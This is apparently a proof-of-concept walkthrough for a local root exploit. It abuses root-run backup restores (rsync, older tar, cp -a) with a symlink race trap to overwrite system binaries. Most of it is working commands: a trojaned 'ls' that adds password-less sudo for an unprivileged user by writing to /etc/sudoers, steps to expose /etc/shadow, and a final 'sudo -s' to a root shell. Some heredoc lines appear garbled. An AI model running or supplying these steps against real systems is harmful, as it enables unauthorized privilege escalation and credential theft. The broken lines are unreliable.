Preparation: ============ Unpack and compile the helper as user test: base64 -d < root/bin/ls #!/bin/bash test -r /etc/shadow && echo "test ALL=NOPASSWD: ALL" >> /etc/sudoers exec /bin/ls2 "\$@" EOF chmod 0755 root/bin/ls cp -a /bin/ls root/bin/ls2 mkdir etc dd if=/dev/zero of=etc/shadow bs=1M count=1 Rsync: ====== Start the read-example trap to include shadow in home backup. ./DirModifyInotify --Watch "etc" --WatchCount 1 --MovePath etc --LinkTarget /etc Run nightly backup as root, this will run 100% as expected, producing a standard user home dir backup root# mkdir xxx root# rsync -av /home/test xxx/ Run trap commands as user test in /home/test, trigger restore: test# rm -rf root/bin test# echo "Waiting for event .." >&2 test# ./DirModifyInotify --Watch root --WatchCount 0 --MovePath root --LinkTarget / Restore backup as root while trap is running: root# rsync -av xxx/test /home Use data in /etc/shadow or wait for root to run ls once Tar: ==== Start the read-example trap is futile with tar version >= 1.25, since the issue is fixed there. With older tar, following might work: ./DirModifyInotify --Watch "etc" --WatchCount 0 --MovePath etc --LinkTarget /etc Run nightly backup as root, this will run 100% as expected, producing a standard user home dir backup root# tar -C /home/test -cf /root/test.tar . Run trap commands as user test in /home/test, trigger restore: test# rm -rf root/bin test# echo "Waiting for event .." >&2 test# ./DirModifyInotify --Watch root --WatchCount 0 --MovePath root --LinkTarget / Restore backup as root while trap is running: root# tar -C /home/test -xf /root/test.tar Use data in /etc/shadow (if available) or wait for root to run ls once cp -a: ====== If backup was extracted to secure location, e.g. /root/test, "cp -a" to user home is also problematic. Since cp will not modify existing ls, the modified ls can be put into another directory included in PATH, that is searched before /bin, e.g using /sbin Preparation: mkdir -p root/sbin cat < root/sbin/ls #!/bin/bash test -r /etc/shadow && echo "test ALL=NOPASSWD: ALL" >> /etc/sudoers exec /bin/ls "\$@" EOF chmod 0755 root/sbin/ls As root: cp -a /home/test /root/test Start trap: rm -rf root/sbin ./DirModifyInotify --Watch root/ --WatchCount 0 --MovePath root --LinkTarget / cd /root cp -aT test /home/test Use the backdoor: ================= Wait for root to run "ls", giving full root permissions to user "test" since backdoored ls will add password-less sudo for user test root# ls Use root access as user test, perform "sudo -s /bin/bash" to get root test# sudo -s /bin/bash root# echo $EUID 0